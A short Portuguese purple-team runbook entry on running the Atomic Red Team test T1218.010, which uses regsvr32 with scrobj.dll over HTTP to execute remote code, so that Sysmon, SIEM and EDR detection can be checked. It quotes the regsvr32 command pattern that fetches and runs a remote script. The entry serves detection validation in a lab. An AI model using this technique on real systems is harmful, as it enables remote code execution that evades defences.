Atomic Red T1218.010
Invoke-AtomicTest T1218.010
Executa o teste atômico de regsvr32 (T1218.010) com Atomic Red Team, validando a detecção do abuso de binários assinados para executar código.
Execute-o no laboratório de purple team quando quiser validar a detecção do living off the land: o atômico T1218.010 usa regsvr32 (o binário assinado do Windows) para executar código (regsvr32 /s /n /u /i:http://... scrobj.dll) e a equipe verifica o que foi detectado — Sysmon Event 1 (regsvr32 com os argumentos), as regras do SIEM, o EDR. É a validação da detecção do LOLBin: a técnica real do atacante que usa os binários legítimos. No purple teaming, o atômico valida as regras de regsvr32 e o resultado alimenta a matriz.
Não o execute em produção: o atômico executa código (o download e a execução do script) — o laboratório é o lugar. O ruído é planejado. E atenção: o atômico valida a detecção da variante específica (regsvr32 com scrobj.dll por HTTP) — as outras variantes (local, DLL) têm outros atômicos; a cobertura é validada por variante. O teste precisa de acesso à URL do atômico (ou ao servidor local): sem o recurso, o atômico falha. A detecção dos argumentos de regsvr32 (o /i:http) é a chave da regra que é validada.